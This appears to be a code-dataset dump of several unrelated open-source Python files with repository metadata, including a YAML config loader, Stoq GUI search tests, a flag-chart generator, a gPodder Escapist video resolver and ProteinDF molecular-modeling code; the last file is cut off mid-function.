os.environ['GIT_SSH'] = os.path.join(os.path.dirname(__file__), 'git_helper.py')
os.environ['GIT_EDITOR'] = 'cat'
from . import server
Thread(target=server.start, args=[cfg, states, queue_handler, repo_cfgs, repos, logger, buildbot_slots, my_username, db, repo_labels, mergeable_que, gh]).start()
Thread(target=fetch_mergeability, args=[mergeable_que]).start()
Thread(target=check_timeout, args=[states, queue_handler]).start()
queue_handler()
if __name__ == '__main__':
main()
|
barosl/homu
|
homu/main.py
|
Python
|
mit
| 37,593 | 0.003937 |
__author__ = 'Fabrizio Lungo<fab@lungo.co.uk>'
import os
import yaml
from __exceptions__.FileNotFound import FileNotFound
from section import ConfigurationSection
class Configuration(ConfigurationSection):
def __init__(self, fn='config.yml', name=None, create=False):
self._fn = fn
self._create = create
self.reload()
if name is None:
name=fn
self._name = name
def reload(self):
if self._create and not os.path.exists(self._fn):
self._config = {}
elif os.path.exists(self._fn):
with open(self._fn, "r") as f:
self._config = yaml.load(f)
else:
raise FileNotFound(filename=self._fn)
def save(self):
with open(self._fn, "w") as f:
yaml.dump(self._config, f)
|
flungo/python-yaml-config
|
lib/yamlconfig/config.py
|
Python
|
mit
| 821 | 0.002436 |
class Solution(object):
def missingNumber(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
xor = len(nums)
for i, n in enumerate(nums):
xor ^= n
xor ^= i
return xor
inputs = [
[0],
[1],
[3,0,1],
[9,6,4,2,3,5,7,0,1]
]
s = Solution()
for i in inputs:
print s.missingNumber(i)
|
daicang/Leetcode-solutions
|
268-missing-number.py
|
Python
|
mit
| 388 | 0.028351 |
# -*- coding: utf-8 -*-
# vi:si:et:sw=4:sts=4:ts=4
##
## Copyright (C) 2008 Async Open Source <http://www.async.com.br>
## All rights reserved
##
## This program is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 2 of the License, or
## (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., or visit: http://www.gnu.org/.
##
## Author(s): Stoq Team <stoq-devel@async.com.br>
##
import datetime
import locale
import mock
import os
import unittest
from dateutil import relativedelta
from dateutil.relativedelta import SU, MO, SA, relativedelta as delta
from stoqlib.api import api
from stoqlib.domain.product import Product
from stoqlib.domain.test.domaintest import DomainTest
from stoqlib.gui.editors.producteditor import ProductEditor
from stoqlib.gui.events import SearchDialogSetupSearchEvent
from stoqlib.gui.search.productsearch import ProductSearch
from stoqlib.gui.search.searchextension import SearchExtension
from stoqlib.gui.search.searchcolumns import SearchColumn, QuantityColumn
from stoqlib.gui.search.searchdialog import SearchDialog
from stoqlib.gui.search.searchfilters import (StringSearchFilter, DateSearchFilter,
ComboSearchFilter, NumberSearchFilter)
from stoqlib.gui.search.searchoptions import (ThisWeek, LastWeek, NextWeek, ThisMonth,
LastMonth, NextMonth)
from stoqlib.gui.test.uitestutils import GUITest
from stoqlib.lib.defaults import get_weekday_start
from stoqlib.lib.introspection import get_all_classes
class TestDateOptions(unittest.TestCase):
def setUp(self):
self._original_locale = locale.getlocale(locale.LC_ALL)
def tearDown(self):
self._set_locale(self._original_locale)
def _get_week_interval(self, today):
weekday = get_weekday_start()
start = today + delta(weekday=weekday(-1))
end = start + delta(days=+6)
return start, end
def _get_month_interval(self, today):
start = today + delta(day=1)
end = start + delta(day=31)
return start, end
def _get_locales(self):
# en_US: week starts on sunday
# es_ES: week starts on monday
return ["en_US.UTF-8", "es_ES.UTF-8"]
def _starts_on_sunday(self, loc):
return loc.startswith("en_US")
def _set_locale(self, loc):
try:
loc = locale.setlocale(locale.LC_ALL, loc)
except locale.Error:
# Some locales could not be available on user's machine, leading
# him to a false positive broke test, so skip it, informing the
# problem.
raise unittest.SkipTest("Locale %s not available" % (loc, ))
else:
os.environ['LC_ALL'] = loc
def _testWeekday(self, loc, interval):
if self._starts_on_sunday(loc):
self.assertEqual(
relativedelta.weekday(interval[0].weekday()), SU)
self.assertEqual(
relativedelta.weekday(interval[1].weekday()), SA)
else:
self.assertEqual(
relativedelta.weekday(interval[0].weekday()), MO)
self.assertEqual(
relativedelta.weekday(interval[1].weekday()), SU)
def test_this_week(self):
option = ThisWeek()
for loc in self._get_locales():
self._set_locale(loc)
# starting in 2008/01/01, wednesday
for i in range(1, 8):
get_today_date = lambda: datetime.date(2008, 1, i)
option.get_today_date = get_today_date
self.assertEqual(option.get_interval(),
self._get_week_interval(get_today_date()))
self._testWeekday(loc, option.get_interval())
def test_last_week(self):
option = LastWeek()
for loc in self._get_locales():
self._set_locale(loc)
# starting in 2008/01/01, wednesday
for i in range(1, 8):
get_today_date = lambda: datetime.date(2008, 1, i)
option.get_today_date = get_today_date
last_week_day = get_today_date() + delta(weeks=-1)
self.assertEqual(option.get_interval(),
self._get_week_interval(last_week_day))
self._testWeekday(loc, option.get_interval())
def test_next_week(self):
option = NextWeek()
for loc in self._get_locales():
self._set_locale(loc)
# starting in 2008/01/01, wednesday
for i in range(1, 8):
get_today_date = lambda: datetime.date(2008, 1, i)
option.get_today_date = get_today_date
next_week_day = get_today_date() + delta(weeks=+1)
self.assertEqual(option.get_interval(),
self._get_week_interval(next_week_day))
self._testWeekday(loc, option.get_interval())
def test_this_month(self):
option = ThisMonth()
for loc in self._get_locales():
self._set_locale(loc)
for month_day in [datetime.date(2007, 1, 1),
datetime.date(2007, 1, 15),
datetime.date(2007, 1, 31)]:
option.get_today_date = lambda: month_day
self.assertEqual(option.get_interval(),
self._get_month_interval(month_day))
def test_last_month(self):
option = LastMonth()
for loc in self._get_locales():
self._set_locale(loc)
for month_day in [datetime.date(2007, 1, 1),
datetime.date(2007, 1, 15),
datetime.date(2007, 1, 31)]:
option.get_today_date = lambda: month_day
last_month_day = month_day + delta(months=-1)
self.assertEqual(option.get_interval(),
self._get_month_interval(last_month_day))
def test_next_month(self):
option = NextMonth()
for loc in self._get_locales():
self._set_locale(loc)
for month_day in [datetime.date(2007, 1, 1),
datetime.date(2007, 1, 15),
datetime.date(2007, 1, 31)]:
option.get_today_date = lambda: month_day
next_month_day = month_day + delta(months=+1)
self.assertEqual(option.get_interval(),
self._get_month_interval(next_month_day))
class TestSearchEditor(GUITest):
"""Tests for SearchEditor"""
@mock.patch('stoqlib.gui.search.searcheditor.api.new_store')
@mock.patch('stoqlib.gui.search.searcheditor.run_dialog')
def test_run_editor(self, run_dialog, new_store):
run_dialog.return_value = True
new_store.return_value = self.store
dialog = ProductSearch(store=self.store)
dialog.search.refresh()
dialog.results.select(dialog.results[0])
product = dialog.results[0].product
with mock.patch.object(self.store, 'commit'):
with mock.patch.object(self.store, 'close'):
self.click(dialog._toolbar.edit_button)
run_dialog.assert_called_once_with(ProductEditor, dialog,
self.store, product,
visual_mode=False)
class TestSearchEvent(GUITest):
def test_search_dialog_setup_search(self):
class ProductSearchExtention(SearchExtension):
spec_attributes = dict(ncm=Product.ncm)
def get_columns(self):
return [SearchColumn('ncm', title='NCM', data_type=str)]
def _setup_search(dialog):
return dialog.add_extension(ProductSearchExtention())
# At leat one product should have a NCM value, so we can verify the
# results.
product = self.store.find(Product).order_by(Product.te_id).first()
product.ncm = u'12345678'
SearchDialogSetupSearchEvent.connect(_setup_search)
dialog = ProductSearch(self.store)
dialog.search.refresh()
self.check_search(dialog, 'product-search-extended')
class TestQuantityColumn(GUITest):
def test_format_func(self):
class Fake(object):
quantity = 0
column = QuantityColumn('quantity')
obj = Fake()
obj.quantity = None
self.assertEquals(column._format_func(obj, True), '0')
obj.quantity = 0
self.assertEquals(column._format_func(obj, True), '0')
obj.quantity = 1
self.assertEquals(column._format_func(obj, True), '1')
obj.product = self.create_product()
obj.sellable = obj.product.sellable
# Without a unit, it should still return just the number
obj.quantity = 1
self.assertEquals(column._format_func(obj, True), '1')
obj.sellable.unit = self.create_sellable_unit(u'Pc')
self.assertEquals(column._format_func(obj, True), '1 Pc')
obj.product.manage_stock = False
self.assertEquals(column._format_func(obj, True), '1 Pc')
obj.quantity = 0
self.assertEquals(column._format_func(obj, True), u"\u221E")
class TestSearchGeneric(DomainTest):
"""Generic tests for searches"""
# Those are base classes for other searches, and should not be instanciated
ignored_classes = [
'_BaseBillCheckSearch',
'SearchEditor',
'BasePersonSearch',
]
@classmethod
def _get_all_searches(cls):
for klass in get_all_classes('stoqlib/gui'):
try:
if klass.__name__ in cls.ignored_classes:
continue
# Exclude SearchDialog, since we just want to test it's subclasses
if not issubclass(klass, SearchDialog) or klass is SearchDialog:
continue
except TypeError:
continue
yield klass
def _test_search(self, search_class):
# XXX: If we use self.store, the all this tests passes, but the test
# executed after this will break with
# storm.exceptions.ClosedError('Connection is closed',)
store = api.new_store()
if search_class.__name__ == 'ProductBranchSearch':
from stoqlib.domain.product import Storable
# This dialog must have a storable to be able to search it in stock
storable = store.find(Storable).any()
dialog = search_class(store, storable)
else:
dialog = search_class(store)
# There may be no results in the search, but we only want to check if
# the query is executed properly
dialog.search.refresh()
# Testing SearchColumns only makes sense if advanced search is enabled
if not dialog.search.menu:
return
columns = dialog.search.result_view.get_columns()
for i in columns:
if not isinstance(i, SearchColumn):
continue
filter = dialog.search.add_filter_by_attribute(
i.search_attribute, i.get_search_label(),
i.data_type, i.valid_values, i.search_func, i.use_having)
# Set some value in the filter, so that it acctually is included in
# the query
if isinstance(filter, StringSearchFilter):
filter.set_state('foo')
elif isinstance(filter, DateSearchFilter):
filter.set_state(datetime.date(2012, 1, 1),
datetime.date(2012, 10, 10))
elif isinstance(filter, NumberSearchFilter):
filter.set_state(1, 3)
elif isinstance(filter, ComboSearchFilter):
for key, value in filter.combo.get_model_items().items():
if value:
filter.set_state(value)
break
dialog.search.refresh()
# Remove the filter so it wont affect other searches
filter.emit('removed')
store.close()
for search in TestSearchGeneric._get_all_searches():
name = 'test' + search.__name__
func = lambda s, v=search: TestSearchGeneric._test_search(s, v)
func.__name__ = name
setattr(TestSearchGeneric, name, func)
del func
|
andrebellafronte/stoq
|
stoqlib/gui/test/test_search.py
|
Python
|
gpl-2.0
| 12,901 | 0.001783 |
# -*- coding: utf-8 -*-
"""
Production settings file for project 'project'
"""
from project.settings import *
DEBUG = False
SITE_DOMAIN = 'sveetch.github.io/Sveetoy'
# Directory where all stuff will be builded
PUBLISH_DIR = os.path.join(PROJECT_DIR, '../docs')
# Path where will be moved all the static files, usually this is a directory in
# the ``PUBLISH_DIR``
STATIC_DIR = os.path.join(PROJECT_DIR, PUBLISH_DIR, 'static')
|
sveetch/Sveetoy
|
project/githubpages_settings.py
|
Python
|
mit
| 428 | 0 |
from pudzu.charts import *
df = pd.read_csv("datasets/flagstriband.csv")
df = pd.concat([pd.DataFrame(df.colours.apply(list).tolist(), columns=list("TMB")), df], axis=1).set_index("colours")
FONT, SIZE = calibri, 24
fg, bg = "black", "#EEEEEE"
default_img = "https://s-media-cache-ak0.pinimg.com/736x/0d/36/e7/0d36e7a476b06333d9fe9960572b66b9.jpg"
COLORS = { "W": "white", "Y": "yellow", "R": "red", "G": "green", "B": "blue", "K": "black", }
W, H = 320, 200
def label(c, size):
w, h = size
label = Image.from_text_bounded(" ", (W,H), SIZE, partial(FONT, bold=True), beard_line=True)
description = Image.from_text_bounded(" ", (W,H), SIZE, partial(FONT, italics=True), beard_line=True)
if c == "Y":
flag = Triangle(max(w,h), "orange", "yellow", p=1.0).crop_to_aspect(w,h).trim(1).pad(1, "grey")
else:
flag = Rectangle((w-2, h-2), RGBA(COLORS.get(c)).blend(bg, 0.1)).pad(1, "grey")
return Image.from_column([label, description, flag], padding=2, bg=bg)
def process(d):
if non(d['name']): return None
label = Image.from_text_bounded(d['name'].replace("*","").upper(), (W,H), SIZE, partial(FONT, bold=True), beard_line=True)
description = Image.from_text_bounded(get_non(d, 'description', " "), (W,H), SIZE, partial(FONT, italics=True), beard_line=True)
flag = Image.from_url_with_cache(get_non(d, 'flag', default_img)).to_rgba()
flag = flag.resize_fixed_aspect(height=H-2) if flag.width / flag.height < 1.3 else flag.resize((W-2,H-2))
flag = flag.pad(1, "grey")
flaglabel = Image.from_column([label, description, flag], padding=2, bg=bg)
if "*" in d['name']: flaglabel = flaglabel.blend(Rectangle(flaglabel.size, bg), 0.3)
return flaglabel
def grid(middle):
ms = df[df.M == middle]
colors = "".join(COLORS).replace(middle,"")
array = [[dict(ms.loc[b+middle+t][["name", "description", "flag"]]) for b in colors] for t in colors]
data = pd.DataFrame(array, index=list(colors), columns=list(colors))
grid = grid_chart(data, process, padding=(10,20), fg=fg, bg=bg, yalign=1,
row_label=lambda row: label(data.index[row], (100, H)), col_label=lambda col: label(data.columns[col], (W,100)), corner_label=label(middle, (100,100)))
return grid
PAD = 100
grids = list(generate_batches([grid(c) for c in COLORS], 2))
grid = Image.from_array(grids, padding=(PAD,PAD//2), bg=bg)
title = Image.from_column([
Image.from_text_bounded("From Austria to Zanzibar".upper(), grid.size, 360, partial(FONT, bold=True), fg=fg, bg=bg, padding=(PAD,20)),
Image.from_text_bounded("a catalog of horizontal triband flags".upper(), grid.size, 240, partial(FONT, bold=True), fg=fg, bg=bg, padding=(PAD,20)),
], padding=0)
img = Image.from_column([title, grid], bg=bg, padding=(20,0)).pad(10, bg)
img.place(Image.from_text("/u/Udzu", FONT(48), fg=fg, bg=bg, padding=10).pad((2,2,0,0), fg), align=1, padding=10, copy=False)
img.save("output/flagstriband.png")
img.resize_fixed_aspect(scale=0.5).save("output/flagstriband2.png")
|
Udzu/pudzu
|
dataviz/flagstriband.py
|
Python
|
mit
| 3,039 | 0.014149 |
# -*- coding: utf-8 -*-
#
# gPodder - A media aggregator and podcast client
# Copyright (c) 2005-2014 Thomas Perl and the gPodder Team
#
# gPodder is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# gPodder is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#
# gpodder.escapist - Escapist Videos download magic
# somini <somini29@yandex.com>; 2014-09-14
#
import gpodder
from gpodder import util
import logging
logger = logging.getLogger(__name__)
try:
# For Python < 2.6, we use the "simplejson" add-on module
import simplejson as json
except ImportError:
# Python 2.6 already ships with a nice "json" module
import json
import re
# This matches the more reliable URL
ESCAPIST_NUMBER_RE = re.compile(r'http://www.escapistmagazine.com/videos/view/(\d+)', re.IGNORECASE)
# This matches regular URL, mainly those that come in the RSS feeds
ESCAPIST_REGULAR_RE = re.compile(r'http://www.escapistmagazine.com/videos/view/([\w-]+)/(\d+)-', re.IGNORECASE)
# This finds the RSS for a given URL
DATA_RSS_RE = re.compile(r'http://www.escapistmagazine.com/rss/videos/list/([1-9][0-9]*)\.xml')
# This matches the flash player's configuration. It's a JSON, but it's always malformed
DATA_CONFIG_RE = re.compile(r'flashvars=.*config=(http.*\.js)', re.IGNORECASE)
# This matches the actual MP4 url, inside the "JSON"
DATA_CONFIG_DATA_RE = re.compile(r'http[:/\w.?&-]*\.mp4')
# This matches the cover art for an RSS. We shouldn't parse XML with regex.
DATA_COVERART_RE = re.compile(r'<url>(http:.+\.jpg)</url>')
class EscapistError(BaseException): pass
def get_real_download_url(url):
video_id = get_escapist_id(url)
if video_id is None:
return url
web_data = get_escapist_web(video_id)
data_config_frag = DATA_CONFIG_RE.search(web_data)
if data_config_frag is None:
raise EscapistError('Cannot get flashvars URL from The Escapist')
data_config_url = data_config_frag.group(1)
logger.debug('Config URL: %s', data_config_url)
data_config_data = util.urlopen(data_config_url).read().decode('utf-8')
data_config_data_frag = DATA_CONFIG_DATA_RE.search(data_config_data)
if data_config_data_frag is None:
raise EscapistError('Cannot get configuration JS from The Escapist')
real_url = data_config_data_frag.group(0)
if real_url is None:
raise EscapistError('Cannot get MP4 URL from The Escapist')
elif "-ad-rotation/" in real_url:
raise EscapistError('Oops, seems The Escapist blocked this IP. Wait a few days/weeks to get it unblocked')
else:
return real_url
def get_escapist_id(url):
result = ESCAPIST_NUMBER_RE.match(url)
if result is not None:
return result.group(1)
result = ESCAPIST_REGULAR_RE.match(url)
if result is not None:
return result.group(2)
return None
def is_video_link(url):
return (get_escapist_id(url) is not None)
def get_real_channel_url(url):
video_id = get_escapist_id(url)
if video_id is None:
return url
web_data = get_escapist_web(video_id)
data_config_frag = DATA_RSS_RE.search(web_data)
if data_config_frag is None:
raise EscapistError('Cannot get RSS URL from The Escapist')
return data_config_frag.group(0)
def get_real_cover(url):
rss_url = get_real_channel_url(url)
if rss_url is None:
return None
rss_data = util.urlopen(rss_url).read()
rss_data_frag = DATA_COVERART_RE.search(rss_data)
if rss_data_frag is None:
return None
return rss_data_frag.group(1)
def get_escapist_web(video_id):
if video_id is None:
return None
web_url = 'http://www.escapistmagazine.com/videos/view/%s' % video_id
return util.urlopen(web_url).read()
|
somini/gpodder
|
src/gpodder/escapist_videos.py
|
Python
|
gpl-3.0
| 4,242 | 0.003772 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2014 The ProteinDF development team.
# see also AUTHORS and README if provided.
#
# This file is a part of the ProteinDF software package.
#
# The ProteinDF is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# The ProteinDF is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ProteinDF. If not, see <http://www.gnu.org/licenses/>.
from .superposer import Superposer
from .matrix import Matrix
from .atomgroup import AtomGroup
from .atom import Atom
from .functions import load_msgpack
from .position import Position
from .error import BrInputError
# from .xyz import Xyz
import os
import math
import re
import logging
logger = logging.getLogger(__name__)
class Modeling:
_ACE_ALA_NME_path_base = os.path.join(
os.environ.get('PDF_HOME', '.'),
'data',
"ACE_ALA_NME_{}.brd")
_ACE_ALA_NME_comformers = ["trans1", "trans2", "cis1", "cis2"]
def __init__(self):
self._ACE_ALA_NME = {}
for comformer in self._ACE_ALA_NME_comformers:
brd_path = self._ACE_ALA_NME_path_base.format(comformer)
# print(comformer, brd_path)
atomgroup = AtomGroup(load_msgpack(brd_path))
assert(atomgroup.get_number_of_all_atoms() > 0)
self._ACE_ALA_NME[comformer] = atomgroup
def _get_ACE_ALA_NME(self, comformer):
assert(comformer in self._ACE_ALA_NME_comformers)
return self._ACE_ALA_NME[comformer]
# -----------------------------------------------------------------
def get_ACE_simple(self, next_aa):
"""
隣のC-alphaの位置をメチル基にする。
"""
answer = AtomGroup()
CAs = next_aa.pickup_atoms('CA')
if len(CAs) > 0:
answer.set_atom('CA', CAs[0])
else:
raise BrInputError(next_aa,
'cannot found "CA" atom on building ACE.')
Cs = next_aa.pickup_atoms('C')
if len(Cs) > 0:
answer.set_atom('C', Cs[0])
else:
raise BrInputError(next_aa,
'cannot found "C" atom on building ACE.')
Os = next_aa.pickup_atoms('O')
if len(Os) > 0:
answer.set_atom('O', Os[0])
else:
raise BrInputError(next_aa,
'cannot found "O" atom on building ACE.')
answer |= self.add_methyl(answer['CA'], answer['C'])
answer.path = '/ACE'
return answer
def get_NME_simple(self, next_aa):
"""
隣のC-alphaの位置をメチル基にする。
"""
answer = AtomGroup()
CAs = next_aa.pickup_atoms('CA')
if len(CAs) > 0:
answer.set_atom('CA', CAs[0])
else:
raise BrInputError(next_aa,
'cannot found "CA" atom on building NME.')
Ns = next_aa.pickup_atoms('N')
if len(Ns) > 0:
answer.set_atom('N', Ns[0])
else:
raise BrInputError(next_aa,
'cannot found "N" atom on building NME.')
Hs = next_aa.pickup_atoms('H')
if len(Hs) > 0:
answer.set_atom('H', Hs[0])
else:
# for proline
CDs = next_aa.pickup_atoms('CD')
if len(CDs) > 0:
dummy_H = Atom(CDs[0])
dummy_H.symbol = 'H'
answer.set_atom('H', dummy_H)
else:
raise BrInputError(next_aa,
'cannot found "H" or "CD" atom(for proline) on building NME.')
answer |= self.add_methyl(answer['CA'], answer['N'])
answer.path = '/NME'
return answer
# -----------------------------------------------------------------
def get_ACE(self, res, next_aa=None):
"""
template (ACE-ALA-NME) format:
HH3[1-3]-CH3-C - N-CA(HA)-C- N-CH3-HH3[1-3]
|| | | || |
O H CB O H
"""
AAN = None
rmsd_min = 1000.0
for comformer in self._ACE_ALA_NME_comformers:
ref_AAN = self._get_ACE_ALA_NME(comformer)
(matched, rmsd) = self._match_ACE(ref_AAN, res, next_aa)
# print(comformer, rmsd)
if rmsd < rmsd_min:
rmsd_min = rmsd
AAN = matched
if rmsd_min > 1.0:
logger.warn("RMSD value is too large: {}".format(rmsd))
answer = AtomGroup(AAN['1'])
answer.path = '/ACE'
return answer
def _match_ACE(self, AAN, res, next_aa):
'''AAN (ACE-ALA-NME)
'''
assert(isinstance(AAN, AtomGroup))
assert(isinstance(res, AtomGroup))
(AAN_part, res_part) = self._match_residues(AAN['2'], res)
# for ACE
if next_aa is not None:
if next_aa.has_atom('N'):
AAN_part.set_atom('N2', AAN['3']['N'])
res_part.set_atom('N2', next_aa['N'])
if next_aa.has_atom('H'):
AAN_part.set_atom('NH2', AAN['3']['H'])
res_part.set_atom('NH2', next_aa['H'])
if next_aa.has_atom('CA'):
AAN_part.set_atom('CH3', AAN['3']['CH3'])
res_part.set_atom('CH3', next_aa['CA'])
sp = Superposer(AAN_part, res_part)
rmsd = sp.rmsd
matched_AAN = sp.superimpose(AAN)
return (matched_AAN, rmsd)
def get_NME(self, res, next_aa=None):
"""
template (ACE-ALA-NME) format:
HH3[1-3]-CH3-C - N-CA(HA)-C- N-CH3-HH3[1-3]
|| | | || |
O H CB O H
"""
AAN = None
rmsd_min = 1000.0
for comformer in self._ACE_ALA_NME_comformers:
ref_AAN = self._get_ACE_ALA_NME(comformer)
(matched, rmsd) = self._match_NME(ref_AAN, res, next_aa)
# print(comformer, rmsd)
if rmsd < rmsd_min:
rmsd_min = rmsd
AAN = matched
if rmsd_min > 1.0:
logger.warn("RMSD value is too large: {}".format(rmsd))
answer = AtomGroup(AAN['3'])
answer.path = '/NME'
return answer
def _match_NME(self, AAN, res, next_aa):
'''AAN (ACE-ALA-NME)
'''
assert(isinstance(AAN, AtomGroup))
assert(isinstance(res, AtomGroup))
(AAN_part, res_part) = self._match_residues(AAN['2'], res)
# for NME
if next_aa is not None:
if next_aa.has_atom('C'):
AAN_part.set_atom('C2', AAN['1']['C'])
res_part.set_atom('C2', next_aa['C'])
if next_aa.has_atom('O'):
AAN_part.set_atom('O2', AAN['1']['O'])
res_part.set_atom('O2', next_aa['O'])
if next_aa.has_atom('CA'):
AAN_part.set_atom('CH3', AAN['1']['CH3'])
res_part.set_atom('CH3', next_aa['CA'])
sp = Superposer(AAN_part, res_part)
rmsd = sp.rmsd
matched_AAN = sp.superimpose(AAN)
return (matched_AAN, rmsd)
def _match_residues(self, res1, res2, max_number_of_atoms=-1):
"""
2つのアミノ酸残基のN, H, CA, HA, C, Oの原子を突き合わせる。
アミノ酸残基がプロリンだった場合は、CDの炭素をHに命名する。
GLYはHA1, HA2とあるので突き合せない。
"""
atom_names = ['CA', 'O', 'C', 'N', 'CB', 'HA']
if max_number_of_atoms == -1:
max_number_of_atoms = len(atom_names)
ans_res1 = AtomGroup()
ans_res2 = AtomGroup()
for atom_name in atom_names:
pickup_atoms1 = res1.pickup_atoms(atom_name)
if len(pickup_atoms1) > 0:
pickup_atoms2 = res2.pickup_atoms(atom_name)
if len(pickup_atoms2) > 0:
ans_res1.set_atom(atom_name, pickup_atoms1[0])
ans_res2.set_atom(atom_name, pickup_atoms2[0])
if ans_res1.get_number_of_atoms() >= max_number_of_atoms:
break
# match amino-'H'
if ans_res1.get_number_of_atoms() < max_number_of_atoms:
res1_H = None
res2_H = None
if res1.has_atom('H'):
res1_H = res1['H']
elif res1.has_atom('CD'):
# for proline
res1_H = res1['CD']
if res2.has_atom('H'):
res2_H = res2['H']
elif res2.has_atom('CD'):
res2_H = res2['CD']
if ((res1_H is not None) and (res2_H is not None)):
ans_res1.set_atom('H', res1_H)
ans_res2.set_atom('H', res2_H)
return (ans_res1, ans_res2)
# -----------------------------------------------------------------
def add_methyl(self, C1, C2):
"""
-CH3の水素を付加
C1に水素を付加
"""
assert(isinstance(C1, Atom))
assert(isinstance(C2, Atom))
ethane = AtomGroup()
ethane.set_atom('C1', Atom(symbol='C', name='C1',
position=Position(0.00000, 0.00000, 0.00000)))
ethane.set_atom('H11', Atom(symbol='H', name='H11',
position=Position(-0.85617, -0.58901, -0.35051)))
ethane.set_atom('H12', Atom(symbol='H', name='H12',
position=Position(-0.08202, 1.03597, -0.35051)))
ethane.set_atom('H13', Atom(symbol='H', name='H13',
position=Position(0.93818, -0.44696, -0.35051)))
ethane.set_atom('C2', Atom(symbol='C', name='C2',
position=Position(0.00000, 0.00000, 1.47685)))
ethane.set_atom('H21', Atom(symbol='H', name='H21',
position=Position(-0.93818, 0.44696, 1.82736)))
ethane.set_atom('H22', Atom(symbol='H', name='H22',
position=Position(0.85617, 0.58901, 1.82736)))
ethane.set_atom('H23', Atom(symbol='H', name='H23',
position=Position(0.08202, -1.03597, 1.82736)))
inC21 = C2.xyz - C1.xyz
refC21 = ethane['C2'].xyz - ethane['C1'].xyz
shift = C1.xyz - ethane['C1'].xyz
rot = self.arbitary_rotate_matrix(inC21, refC21)
ethane.rotate(rot)
ethane.shift_by(shift)
assert(C1.xyz == ethane['C1'].xyz)
answer = AtomGroup()
answer.set_atom('H11', ethane['H11'])
answer.set_atom('H12', ethane['H12'])
answer.set_atom('H13', ethane['H13'])
return answer
# -----------------------------------------------------------------
def get_NH3(self, angle=0.5 * math.pi, length=1.0):
pi23 = math.pi * 2.0 / 3.0 # (pi * 2/3)
sin23 = math.sin(pi23)
cos23 = math.cos(pi23)
# pi43 = math.pi * 4.0 / 3.0 # (pi * 4/3)
# sin43 = math.sin(pi43)
# cos43 = math.cos(pi43)
sin_input = math.sin(angle)
cos_input = math.cos(angle)
# z軸まわりに120度回転
# z1_rot = Matrix(3, 3)
# z1_rot.set(0, 0, cos23)
# z1_rot.set(0, 1, -sin23)
# z1_rot.set(1, 0, sin23)
# z1_rot.set(1, 1, cos23)
# z1_rot.set(2, 2, 1.0)
# z軸まわりに240度回転
# z2_rot = Matrix(3, 3)
# z2_rot.set(0, 0, cos43)
# z2_rot.set(0, 1, -sin43)
# z2_rot.set(1, 0, sin43)
# z2_rot.set(1, 1, cos43)
# z2_rot.set(2, 2, 1.0)
# y軸まわりに回転
# y_rot = Matrix(3, 3)
# y_rot.set(0, 0, cos_input)
# y_rot.set(0, 2, -sin_input)
# y_rot.set(2, 0, sin_input)
# y_rot.set(2, 2, cos_input)
# y_rot.set(1, 1, 1.0)
# pos_H1 = Position(1.0, 0.0, 0.0)
# pos_H1.rotate(y_rot)
# pos_H1 *= length
# pos_H2 = Position(1.0, 0.0, 0.0)
# pos_H2.rotate(y_rot)
# pos_H2.rotate(z1_rot)
# pos_H2 *= length
# pos_H3 = Position(1.0, 0.0, 0.0)
# pos_H3.rotate(y_rot)
# pos_H3.rotate(z2_rot)
# pos_H3 *= length
# X-Z平面上、Y軸に対してangle度開く
xz_rot = Matrix(3, 3)
xz_rot.set(0, 0, cos_input)
xz_rot.set(0, 2, -sin_input)
xz_rot.set(2, 0, sin_input)
xz_rot.set(2, 2, cos_input)
xz_rot.set(1, 1, 1.0)
# X-Y平面上、Z軸に対して120度開く
xy_rot = Matrix(3, 3)
xy_rot.set(0, 0, cos23)
xy_rot.set(0, 1, -sin23)
xy_rot.set(1, 0, sin23)
xy_rot.set(1, 1, cos23)
xy_rot.set(2, 2, 1.0)
pos_H1 = Position(0.0, 0.0, 1.0)
pos_H1.rotate(xz_rot)
pos_H2 = Position(0.0, 0.0, 1.0)
pos_H2.rotate(xz_rot)
pos_H2.rotate(xy_rot)
pos_H3 = Position(0.0, 0.0, 1.0)
pos_H3.rotate(xz_rot)
pos_H3.rotate(xy_rot)
pos_H3.rotate(xy_rot)
pos_H1 *= length
pos_H2 *= length
pos_H3 *= length
NH3 = AtomGroup()
N = Atom(symbol='N',
position=Position(0.0, 0.0, 0.0))
H1 = Atom(symbol='H',
position=pos_H1)
H2 = Atom(symbol='H',
position=pos_H2)
H3 = Atom(symbol='H',
position=pos_H3)
# X1 = Atom(symbol = 'X',
# position = Position(1.0, 0.0, 0.0))
# X2 = Atom(symbol = 'X',
# position = Position(0.0, 1.0, 0.0))
# X3 = Atom(symbol = 'X',
# position = Position(0.0, 0.0, 1.0))
NH3.set_atom('N', N)
NH3.set_atom('H1', H1)
NH3.set_atom('H2', H2)
NH3.set_atom('H3', H3)
# NH3.set_atom('X1', X1)
# NH3.set_atom('X2', X2)
# NH3.set_atom('X3', X3)
return NH3
# -----------------------------------------------------------------
def select_residues(self, chain, from_resid, to_resid):
'''
連続したアミノ酸残基を返す
'''
answer = AtomGroup()
for resid, res in chain.groups():
resid = int(resid)
if from_resid <= resid <= to_resid:
answer |= res
return answer
# -----------------------------------------------------------------
def arbitary_rotate_matrix(self, in_a, in_b):
"""
ベクトルaをbへ合わせる回転行列(3x3)を返す
"""
assert(isinstance(in_a, Position))
assert(isinstance(in_b, Position))
a = Position(in_a)
b = Position(in_b)
a.norm()
b.norm()
cos_theta = a.dot(b)
sin_theta = math.sqrt(1 - cos_theta * cos_theta)
n = a.cross(b)
